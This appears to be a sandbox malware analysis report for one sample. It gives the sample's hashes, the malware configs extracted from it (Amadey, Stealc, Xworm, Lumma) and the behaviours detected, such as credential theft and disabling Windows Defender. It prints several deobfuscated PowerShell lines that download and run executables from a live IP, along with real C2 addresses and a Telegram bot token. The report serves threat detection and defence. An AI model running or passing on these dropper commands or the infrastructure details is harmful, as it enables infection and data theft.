General

  • Target

    54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a

  • Size

    2.0MB

  • Sample

    250222-ppv8mawles

  • MD5

    354e5ac5449695bd3e8520e47ba4815e

  • SHA1

    a023339baaea904f78d73c5b440ffa764aa9b6a2

  • SHA256

    54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a

  • SHA512

    ab31ab9d52efb5955003f62ec7d87dd706daf322d154a03bbe3533c385f9802777b1e939b9cfdbe9acd4431e7855907ae0d3c88a89ced8b20fb30a008550d42e

  • SSDEEP

    49152:PyurhZIw1XiVWyvHdT8rXVZJDBw+fsPtoajy/v/FGiLi/0/dN:n0swdTiXBBRsPCRpLiE

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "UOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/defend/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "\\483d2fa8a0d53818306efeb32d3.exe"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "7E3NIXXMDNKTP108RHW4DBGOIWXT4VJY.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz

Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain
1
bf11e9eb444cca0553e5dc41fdf05974

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain
1
SgDOJiJwEfDNI1jIdrs45g==

Extracted

Family

lumma

C2

https://embarkiffe.shop/api

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "FG1MDSETHXIPMQTT4XE9FDFG3OOQZLEI.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/defend/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "IF1OGE3LXDHAH37KWUNZJ8ZPNUPDUGWN.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Targets

    • Target

      54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a

    • Size

      2.0MB

    • MD5

      354e5ac5449695bd3e8520e47ba4815e

    • SHA1

      a023339baaea904f78d73c5b440ffa764aa9b6a2

    • SHA256

      54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a

    • SHA512

      ab31ab9d52efb5955003f62ec7d87dd706daf322d154a03bbe3533c385f9802777b1e939b9cfdbe9acd4431e7855907ae0d3c88a89ced8b20fb30a008550d42e

    • SSDEEP

      49152:PyurhZIw1XiVWyvHdT8rXVZJDBw+fsPtoajy/v/FGiLi/0/dN:n0swdTiXBBRsPCRpLiE

    • Amadey

      Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    • Amadey family

    • Detect Poverty Stealer Payload

    • Detect Xworm Payload

    • Detects Healer an antivirus disabler dropper

    • GCleaner

      GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    • Gcleaner family

    • Healer

      Healer an antivirus disabler dropper.

    • Healer family

    • Lumma Stealer, LummaC

      Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    • Lumma family

    • Modifies Windows Defender DisableAntiSpyware settings

    • Modifies Windows Defender Real-time Protection settings

    • Modifies Windows Defender TamperProtection settings

    • Modifies Windows Defender notification settings

    • Poverty Stealer

      Poverty Stealer is a crypto and infostealer written in C++.

    • Povertystealer family

    • Stealc

      Stealc is an infostealer written in C++.

    • Stealc family

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Xworm family

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Downloads MZ/PE file

    • Uses browser remote debugging

      Can be used control the browser and steal sensitive information such as credentials and session cookies.

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Identifies Wine through registry keys

      Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    • Loads dropped DLL

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Unsecured Credentials: Credentials In Files

      Steal credentials from unsecured files.

    • Windows security modification

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • AutoIT Executable

      AutoIT scripts compiled to PE executables.

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.